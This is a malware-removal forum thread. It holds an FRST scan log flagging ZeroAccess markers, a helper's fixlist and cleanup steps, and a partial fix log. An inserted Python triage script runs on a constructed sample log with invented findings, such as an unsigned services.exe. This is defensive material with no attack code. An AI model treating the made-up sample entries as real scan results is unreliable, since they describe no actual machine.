U5 ScsiPort; H:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-13] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-19 17:39 - 2015-06-19 17:39 - 00000000 ____D H:\FRST
2015-06-18 22:34 - 2015-06-18 22:36 - 00004842 _____ H:\Documents and Settings\Daniel\Desktop\Rkill.txt
2015-06-18 22:33 - 2015-06-18 20:57 - 01943800 _____ (Bleeping Computer, LLC) H:\Documents and Settings\Daniel\Desktop\rkill.exe
2015-06-18 22:02 - 2015-06-18 22:30 - 00000000 ____D H:\Documents and Settings\Daniel\Desktop\mbar
2015-06-18 06:19 - 2015-06-18 22:09 - 00119512 _____ (Malwarebytes Corporation) H:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-06-18 00:59 - 2015-06-18 00:59 - 00000788 _____ H:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2015-06-18 00:58 - 2015-06-18 22:05 - 00120024 _____ (Malwarebytes Corporation) H:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-06-18 00:58 - 2015-06-18 00:59 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2015-06-18 00:58 - 2015-06-18 00:58 - 00000000 ____D H:\Program Files\Malwarebytes Anti-Malware
2015-06-18 00:58 - 2015-04-14 09:37 - 00023256 _____ (Malwarebytes Corporation) H:\WINDOWS\system32\Drivers\mbam.sys
2015-06-17 18:04 - 2015-06-18 07:23 - 00008192 _____ H:\WINDOWS\system32\WDPABKP.dat
2015-06-06 04:09 - 2015-06-06 04:09 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\TeamViewer 10
2015-05-26 21:08 - 2015-05-26 21:08 - 00000000 ____D H:\Documents and Settings\Daniel\Desktop\Super 8
2015-05-25 19:12 - 2015-05-25 19:12 - 00043682 _____ H:\Documents and Settings\Daniel\Local Settings\Tempdivxf9e7
2015-05-25 19:11 - 2015-05-25 19:12 - 00003737 _____ H:\Documents and Settings\All Users\Application Data\lpm.dat
2015-05-25 10:33 - 2015-06-14 14:04 - 00000000 ____D H:\Documents and Settings\Daniel\Desktop\Torque
2015-05-24 09:11 - 2015-05-24 10:17 - 00000000 ____D H:\Program Files\AudioLabel
2015-05-24 09:11 - 2015-05-24 09:14 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Application Data\AudioLabel
2015-05-24 09:11 - 2015-05-24 09:11 - 00000717 _____ H:\Documents and Settings\All Users\Desktop\AudioLabel.lnk
2015-05-24 09:11 - 2015-05-24 09:11 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\AudioLabel
2015-05-22 17:51 - 2015-06-18 07:18 - 00393216 _____ H:\WINDOWS\system32\config\ACEEvent.evt
2015-05-22 17:51 - 2015-05-22 17:51 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Application Data\ATI
2015-05-22 17:51 - 2015-05-22 17:51 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\ATI
2015-05-22 17:51 - 2015-05-22 17:51 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\ATI
2015-05-22 17:48 - 2015-05-22 17:48 - 00000131 _____ H:\Documents and Settings\All Users\Application Data\LaunchURL.bat
2015-05-22 17:48 - 2015-05-22 17:48 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\Catalyst Control Center
2015-05-22 17:47 - 2015-05-22 17:47 - 00000000 _____ H:\WINDOWS\ativpsrm.bin
2015-05-22 17:47 - 2013-04-11 13:45 - 00442368 ____R (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\ATIDEMGX.dll
2015-05-22 17:47 - 2013-04-11 12:43 - 00307200 ____R (ATI Technologies Inc.) H:\WINDOWS\system32\atiiiexx.dll
2015-05-22 17:47 - 2013-04-11 12:29 - 00296200 ____R H:\WINDOWS\system32\atiapfxx.blb
2015-05-22 17:47 - 2012-11-30 08:32 - 00662787 ____R H:\WINDOWS\system32\atiicdxx.dat
2015-05-22 17:47 - 2012-07-15 22:25 - 00038445 ____R H:\WINDOWS\atiogl.xml
2015-05-22 17:47 - 2012-05-14 02:12 - 00103040 ____R (Advanced Micro Devices) H:\WINDOWS\system32\Drivers\AtihdXP3.sys
2015-05-22 17:46 - 2013-04-11 13:56 - 00071192 _____ (Advanced Micro Devices, Inc. ) H:\WINDOWS\system32\atimpc32.dll
2015-05-22 17:46 - 2013-04-11 13:56 - 00071192 _____ (Advanced Micro Devices, Inc. ) H:\WINDOWS\system32\amdpcom32.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00212992 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\atipdlxx.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00192512 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00163840 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\Oemdspif.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00043520 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\ati2edxx.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00026112 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\Ati2mdxx.exe
2015-05-22 17:46 - 2013-04-11 13:20 - 00643072 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.exe
2015-05-22 17:46 - 2013-04-11 13:19 - 00053248 _____ ( ATI Technologies Inc.) H:\WINDOWS\system32\ATIDDC.DLL
2015-05-22 17:46 - 2013-04-11 12:49 - 18964480 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atioglxx.dll
2015-05-22 17:46 - 2013-04-11 12:38 - 01586720 _____ H:\WINDOWS\system32\ativvaxx.cap
2015-05-22 17:46 - 2013-04-11 12:27 - 00163840 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atiapfxx.exe
2015-05-22 17:46 - 2013-04-11 12:23 - 00929792 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\atikvmag.dll
2015-05-22 17:46 - 2013-04-11 12:18 - 00245760 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atiadlxx.dll
2015-05-22 17:46 - 2013-04-11 12:18 - 00017408 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\atitvo32.dll
2015-05-22 17:46 - 2013-04-11 12:17 - 00053248 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\Drivers\ati2erec.dll
2015-05-22 17:46 - 2013-04-11 12:15 - 00495616 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atiok3x2.dll
2015-05-22 17:46 - 2010-08-27 14:32 - 00294912 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\ATIODE.exe
2015-05-22 17:46 - 2009-06-22 11:34 - 00045056 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\ATIODCLI.exe
2015-05-22 17:46 - 2009-05-11 17:35 - 00118784 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atibtmon.exe
2015-05-22 17:46 - 2001-11-09 12:01 - 00024064 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\ativcoxx.dll
2015-05-22 17:45 - 2015-05-22 17:48 - 00000000 ____D H:\Program Files\ATI Technologies
2015-05-22 17:45 - 2015-05-22 17:45 - 00000000 ____D H:\Program Files\ATI
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-19 17:40 - 2010-08-18 11:08 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Temp
2015-06-19 17:25 - 2014-03-11 16:49 - 00000830 _____ H:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-06-19 17:23 - 2011-07-16 11:23 - 00000982 _____ H:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1645522239-117609710-725345543-1003UA.job
2015-06-19 04:25 - 2010-08-18 11:07 - 00032554 _____ H:\WINDOWS\SchedLgU.Txt
2015-06-18 22:30 - 2013-07-03 17:53 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\Malwarebytes' Anti-Malware (portable)
2015-06-18 21:57 - 2010-08-18 11:01 - 01107923 _____ H:\WINDOWS\WindowsUpdate.log
2015-06-18 20:18 - 2011-02-16 00:21 - 00000000 ____D H:\Program Files\TeamViewer
2015-06-18 18:23 - 2011-07-16 11:23 - 00000930 _____ H:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1645522239-117609710-725345543-1003Core.job
2015-06-18 07:22 - 2010-08-18 06:44 - 00000402 _____ H:\WINDOWS\wiadebug.log
2015-06-18 07:20 - 2015-01-07 22:56 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\TorchCrashHandler
2015-06-18 07:20 - 2010-08-18 11:07 - 00000006 ____H H:\WINDOWS\Tasks\SA.DAT
2015-06-18 07:20 - 2010-08-18 06:44 - 00000049 _____ H:\WINDOWS\wiaservc.log
2015-06-18 07:18 - 2013-04-09 20:36 - 00000000 __HDC H:\WINDOWS\$NtUninstallKB2813170$
2015-06-18 07:18 - 2010-08-18 11:08 - 00000178 ___SH H:\Documents and Settings\Daniel\ntuser.ini
2015-06-18 01:00 - 2011-10-11 17:15 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\Malwarebytes
2015-06-18 00:58 - 2011-10-11 17:15 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\Malwarebytes
2015-06-18 00:20 - 2011-10-11 17:15 - 00000000 ____D H:\Program Files\Malwarebytes' Anti-Malware
2015-06-17 22:16 - 2011-07-13 22:27 - 00001984 _____ H:\WINDOWS\system32\d3d9caps.dat
2015-06-16 18:52 - 2005-04-03 18:27 - 00002228 _____ H:\WINDOWS\system32\wpa.dbl
2015-06-16 18:51 - 2013-12-21 10:31 - 00000000 ____D H:\Program Files\SUPERAntiSpyware
2015-06-16 18:45 - 2015-01-13 22:37 - 00000000 ___HD H:\Documents and Settings\All Users\Application Data\{88B60AEA-CBC9-4FDE-978C-EB22BD2333B2}
2015-06-16 12:25 - 2011-10-30 17:32 - 00000284 _____ H:\WINDOWS\Tasks\AppleSoftwareUpdate.job
2015-06-16 07:18 - 2010-08-19 20:16 - 00001738 ____H H:\Documents and Settings\Daniel\My Documents\Default.rdp
2015-06-16 07:13 - 2011-04-22 16:46 - 00000053 _____ H:\WINDOWS\brmx2001.ini
2015-06-15 02:00 - 2015-01-01 14:54 - 00000590 _____ H:\WINDOWS\Tasks\____Volume_a5c8acf3_aaa3_11df_9334_806d6172696f______Volume_f7a12243_8f08_11e4_9663_6cf0499edbd8__.job
2015-06-14 02:02 - 2011-06-06 17:20 - 00000000 ____D H:\WINDOWS\system32\NtmsData
2015-06-14 02:00 - 2015-01-03 18:22 - 00000590 _____ H:\WINDOWS\Tasks\____Volume_dae9f62a_ad27_11df_8b20_6cf0499edbd8______Volume_f7a12243_8f08_11e4_9663_6cf0499edbd8__.job
2015-06-13 00:34 - 2011-07-16 15:18 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\BitTorrent
2015-06-13 00:34 - 2010-08-19 00:11 - 00000000 ____D H:\Temp
2015-06-11 23:29 - 2010-08-19 20:38 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\FileZilla
2015-06-11 23:26 - 2010-08-22 17:26 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Application Data\Paint.NET
2015-06-11 23:26 - 2010-08-19 20:23 - 00000000 ____D H:\Documents and Settings\Daniel\My Documents\My PSP Files
2015-06-09 15:26 - 2010-08-19 18:49 - 00043008 _____ H:\Documents and Settings\Daniel\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-06-09 14:24 - 2011-08-13 13:53 - 00002304 _____ H:\Documents and Settings\Daniel\Desktop\Google Chrome.lnk
2015-06-07 02:01 - 2010-08-18 11:00 - 00000000 ____D H:\WINDOWS\Registration
2015-05-25 18:58 - 2013-09-25 22:29 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\DivX
2015-05-25 18:58 - 2010-11-29 01:09 - 00000000 ____D H:\Program Files\DivX
2015-05-25 18:58 - 2010-11-29 01:08 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\DivX
2015-05-25 16:50 - 2013-10-09 07:03 - 00526282 _____ H:\WINDOWS\setupapi.log
2015-05-24 08:45 - 2014-02-11 20:04 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\Mp3tag
2015-05-24 02:16 - 2014-01-11 15:35 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch
2015-05-24 02:14 - 2014-01-11 15:36 - 00001109 _____ H:\Documents and Settings\Daniel\Start Menu\Programs\Torch.lnk
2015-05-23 15:58 - 2010-08-18 11:15 - 00000000 ____D H:\Program Files\NVIDIA Corporation
2015-05-23 15:58 - 2010-08-18 06:32 - 00000000 ____D H:\WINDOWS\Help
2015-05-22 18:18 - 2010-08-19 19:39 - 00000000 ____D H:\Program Files\Google
2015-05-22 17:43 - 2013-10-09 07:03 - 00018361 _____ H:\WINDOWS\setupact.log
 
==================== Files in the root of some directories =======
 
2011-02-02 09:34 - 2011-02-02 09:34 - 0007887 _____ () H:\Documents and Settings\Daniel\Application Data\pcouffin.cat
2011-02-02 09:34 - 2011-02-02 09:34 - 0001144 _____ () H:\Documents and Settings\Daniel\Application Data\pcouffin.inf
2011-02-02 09:34 - 2011-02-02 09:34 - 0000034 _____ () H:\Documents and Settings\Daniel\Application Data\pcouffin.log
2011-02-02 09:34 - 2011-02-02 09:34 - 0047360 _____ (VSO Software) H:\Documents and Settings\Daniel\Application Data\pcouffin.sys
2015-01-14 19:07 - 2015-01-14 19:07 - 0000480 ____H () H:\Documents and Settings\Daniel\Application Data\麽鎒駓覜
2010-08-19 18:49 - 2015-06-09 15:26 - 0043008 _____ () H:\Documents and Settings\Daniel\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-12-25 12:54 - 2011-12-25 12:54 - 0000129 _____ () H:\Documents and Settings\Daniel\Local Settings\Application Data\fusioncache.dat
2013-06-16 17:09 - 2013-06-16 17:09 - 0000218 _____ () H:\Documents and Settings\Daniel\Local Settings\Application Data\recently-used.xbel
ZeroAccess:
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Desktop\Install
ZeroAccess:
H:\Program Files\Google\Desktop\Install
 
Some files in TEMP:
====================
H:\Documents and Settings\Daniel\Local Settings\Temp\24E.tmp-dBpoweramp-Codec-m4a FDK (AAC) Encoder-32.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\25B.tmp-QuitdBpoweramp.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\325.tmp-dBpoweramp-Codec-m4a FDK (AAC) Encoder-32.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\350.tmp-dBpoweramp-Codec-aac-encoder-32bit.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\35D.tmp-QuitdBpoweramp.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\difxapi.dll
H:\Documents and Settings\Daniel\Local Settings\Temp\DivXSetup.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\hpzmsi01.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\hpzscr01.EXE
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-7u51-windows-i586-iftw.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-7u55-windows-i586-iftw.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-8u31-windows-au.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-8u40-windows-au.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-8u45-windows-au.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\siuninst.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\uttB533.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
H:\WINDOWS\explorer.exe => File is digitally signed
H:\WINDOWS\system32\winlogon.exe => File is digitally signed
H:\WINDOWS\system32\svchost.exe => File is digitally signed
H:\WINDOWS\system32\services.exe => File is digitally signed
H:\WINDOWS\system32\User32.dll => File is digitally signed
H:\WINDOWS\system32\userinit.exe => File is digitally signed
H:\WINDOWS\system32\rpcss.dll => File is digitally signed
H:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== End of log ============================

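The FRST log above is long, and a responder usually wants the handful of entries worth a second look pulled out: the `ZeroAccess:` reparse-point markers, entries FRST tagged with `ATTENTION`, core system files that fail the Bamital/volsnap signature check, and files under a user profile that are hidden or carry a non-ASCII name like the one sitting in `Application Data` above. The following Python script is an added example written for this thread; it is not part of FRST, Zoek or any post here, and it only parses the text formats visible in the log. The sample log it runs on is constructed from those formats (the all-zero GUID folder, the `ExampleSvc` service line and the unsigned `services.exe` result are made up), not copied from the poster's machine.

```python
"""Triage helper for Farbar Recovery Scan Tool (FRST) text logs.

Added example, not part of FRST or of the forum thread.  It recognises the
line shapes that appear in an FRST scan log:

  <created> - <modified> - <size> <attrs> [(company)] <path>
  ZeroAccess:                      (the flagged path follows on the next line)
  <path> => File is digitally signed   (Bamital & volsnap check)
  <anything> <==== ATTENTION

and collects the entries a responder should review first.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# "2015-05-22 17:46 - 2013-04-11 13:20 - 00643072 _____ (ATI Technologies Inc.) H:\WINDOWS\..."
FILE_LINE = re.compile(
    r"^(?P<created>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<modified>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<size>\d+) (?P<attrs>[_A-Z]{5}) "
    r"(?:\((?P<company>[^)]*)\) )?"      # optional version-info company, may be "()"
    r"(?P<path>\S.*)$"
)
# "H:\WINDOWS\explorer.exe => File is digitally signed"
SIG_LINE = re.compile(r"^(?P<path>[A-Z]:\\.+?) => (?P<state>.+)$")
EXEC_EXT = (".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx")


@dataclass
class Finding:
    kind: str
    path: str
    detail: str = ""


@dataclass
class Triage:
    files: int = 0                      # dated file/folder entries parsed
    findings: List[Finding] = field(default_factory=list)

    def by_kind(self, kind: str) -> List[Finding]:
        return [f for f in self.findings if f.kind == kind]

    def counts(self) -> Dict[str, int]:
        out: Dict[str, int] = {}
        for f in self.findings:
            out[f.kind] = out.get(f.kind, 0) + 1
        return out


def triage_frst(text: str) -> Triage:
    """Parse an FRST log and return the entries that deserve manual review."""
    t = Triage()
    pending_zeroaccess = False          # set after a bare "ZeroAccess:" line
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if pending_zeroaccess:
            t.findings.append(Finding("zeroaccess_marker", line,
                                      "FRST flagged this path as a ZeroAccess-style reparse point"))
            pending_zeroaccess = False
            continue
        if line == "ZeroAccess:":
            pending_zeroaccess = True
            continue
        m = SIG_LINE.match(line)
        if m:
            # Anything other than the pass string on a signature-check line is a failure.
            if "sign" in m["state"].lower() and m["state"] != "File is digitally signed":
                t.findings.append(Finding("unsigned_core_file", m["path"],
                                          "core system file failed signature check"))
            continue
        if "ATTENTION" in line:
            t.findings.append(Finding("attention", line, "entry FRST marked with ATTENTION"))
            continue
        m = FILE_LINE.match(line)
        if not m:
            continue
        t.files += 1
        path, attrs, company = m["path"], m["attrs"], m["company"]
        if any(ord(c) > 127 for c in path):
            t.findings.append(Finding("non_ascii_name", path, "non-ASCII characters in file name"))
        if ("H" in attrs or "S" in attrs) and "Application Data" in path:
            t.findings.append(Finding("hidden_in_profile", path, f"attributes {attrs} under a user profile"))
        if path.lower().endswith(EXEC_EXT) and not company:
            t.findings.append(Finding("no_publisher", path, "executable with no version-info company name"))
    return t


# Constructed sample in the FRST format; GUID folder, ExampleSvc and the unsigned result are made up.
SAMPLE_LOG = r"""
==================== One Month Modified files and folders ========

2015-06-16 18:45 - 2015-01-13 22:37 - 00000000 ___HD H:\Documents and Settings\All Users\Application Data\{00000000-0000-0000-0000-000000000000}
2015-06-09 14:24 - 2011-08-13 13:53 - 00002304 _____ H:\Documents and Settings\Daniel\Desktop\Google Chrome.lnk
2015-05-22 17:46 - 2013-04-11 13:20 - 00643072 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.exe
2015-05-22 17:46 - 2013-04-11 12:38 - 01586720 _____ H:\WINDOWS\system32\ativvaxx.cap
2015-06-18 07:20 - 2015-06-18 07:20 - 00012288 _____ H:\Documents and Settings\Daniel\Local Settings\Temp\uttB533.tmp.exe

==================== Files in the root of some directories =======

2015-01-14 19:07 - 2015-01-14 19:07 - 0000480 ____H () H:\Documents and Settings\Daniel\Application Data\麽鎒駓覜
2011-12-25 12:54 - 2011-12-25 12:54 - 0000129 _____ () H:\Documents and Settings\Daniel\Local Settings\Application Data\fusioncache.dat
ZeroAccess:
H:\Program Files\Google\Desktop\Install

==================== Bamital & volsnap Check =================

H:\WINDOWS\explorer.exe => File is digitally signed
H:\WINDOWS\system32\services.exe => File is not signed
R2 ExampleSvc; H:\Documents and Settings\Daniel\Local Settings\Application Data\Example\svc.exe [12345 2015-05-12] (Example Ltd) <==== ATTENTION
"""

if __name__ == "__main__":
    result = triage_frst(SAMPLE_LOG)
    print(f"{result.files} dated entries parsed, {len(result.findings)} findings")
    for f in result.findings:
        print(f"[{f.kind}] {f.path} :: {f.detail}")
```

The script only ranks entries for a human; a hidden GUID folder or a binary without version info is a reason to look, not proof of infection. Paste a real log into `triage_frst()` and read the `zeroaccess_marker`, `unsigned_core_file` and `attention` findings first, since those are the ones FRST itself considers significant.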

#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,242 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:09:07 PM

Posted 23 June 2015 - 08:51 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Run this tool to clean your Temporary files/Folders.

Download TFC to your desktop
  • Close any open windows.
  • Double click the TFC icon to run the program.
  • TFC will close all open programs itself in order to run.
  • Click the Start button to begin the process.
  • Allow TFC to run uninterrupted, it should not take long to finish.
  • Once it's finished, click OK to reboot.
  • If it does not reboot, reboot your system manually.
===

Remove these programs using the Add/Remove Programs applet.

Torch (HKU\S-1-5-21-1645522239-117609710-725345543-1003\...\Torch) (Version: 39.0.0.9626 - Torch Media, Inc) <==== ATTENTION
YTD Video Downloader PRO v4.7.3.0 (HKLM\...\YTD Video Downloader PRO v4.7.3.04.7.3.0) (Version: 4.7.3.0 - Friends in War) <==== ATTENTION

---

Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
 
start

CreateRestorePoint:
CloseProcesses:

(TorchMedia Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe
(Advanced Micro Devices Inc.) H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1645522239-117609710-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
Winsock: Catalog5 01 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog9 04 mswsock.dll File not found
Winsock: Catalog9 05 mswsock.dll File not found
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-08-13]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-10-06]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-10-26]
R2 TorchCrashHandler; H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe [1217032 2015-05-12] (TorchMedia Inc.) <==== ATTENTION
S4 BITS; C:\WINDOWS\system32\qmgr.dll [X]
S4 wuauserv; C:\WINDOWS\system32\wuauserv.dll [X]
S3 catchme; \??\H:\DOCUME~1\Daniel\LOCALS~1\Temp\catchme.sys [X]
S3 easytether; system32\DRIVERS\easytthr.sys [X]
S3 htcdiag; system32\DRIVERS\htcdiag.sys [X]
S4 IntelIde; No ImagePath
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
AlternateDataStreams: H:\Documents and Settings\All Users\Application Data\TEMP:FB1B13D8
H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, close the AdwCleaner window.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===

How is the computer running now?

#3 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 23 June 2015 - 06:43 PM

Fix result of Farbar Recovery Scan Tool (x86) Version: 13-06-2015
Ran by Daniel at 2015-06-23 22:41:01 Run:1
Running from E:\AV\frst
Loaded Profiles: Daniel (Available Profiles: Daniel)
Boot Mode: Normal

==============================================

fixlist content:
*****************
start

CreateRestorePoint:
CloseProcesses:

(TorchMedia Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe
(Advanced Micro Devices Inc.) H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1645522239-117609710-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
Winsock: Catalog5 01 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog9 04 mswsock.dll File not found
Winsock: Catalog9 05 mswsock.dll File not found
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-08-13]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-10-06]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-10-26]
R2 TorchCrashHandler; H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe [1217032 2015-05-12] (TorchMedia Inc.) <==== ATTENTION
S4 BITS; C:\WINDOWS\system32\qmgr.dll [X]
S4 wuauserv; C:\WINDOWS\system32\wuauserv.dll [X]
S3 catchme; \??\H:\DOCUME~1\Daniel\LOCALS~1\Temp\catchme.sys [X]
S3 easytether; system32\DRIVERS\easytthr.sys [X]
S3 htcdiag; system32\DRIVERS\htcdiag.sys [X]
S4 IntelIde; No ImagePath
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
AlternateDataStreams: H:\Documents and Settings\All Users\Application Data\TEMP:FB1B13D8
H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch

End
*****************

Restore point was successfully created.
Processes closed successfully.
H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe => No running process found
H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe => No running process found
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully.
"HKU\S-1-5-21-1645522239-117609710-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
Winsock: Catalog5 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\System32\mswsock.dll
Winsock: Catalog5 entry 000000000003\\LibraryPath  was set successfully to %SystemRoot%\System32\mswsock.dll
The possible legit Catalog entry "000000000004" will not be deleted with FRST. Instead, "netsh winsock reset" can be used.
The possible legit Catalog entry "000000000005" will not be deleted with FRST. Instead, "netsh winsock reset" can be used.
H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} => moved successfully.
H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} => moved successfully.
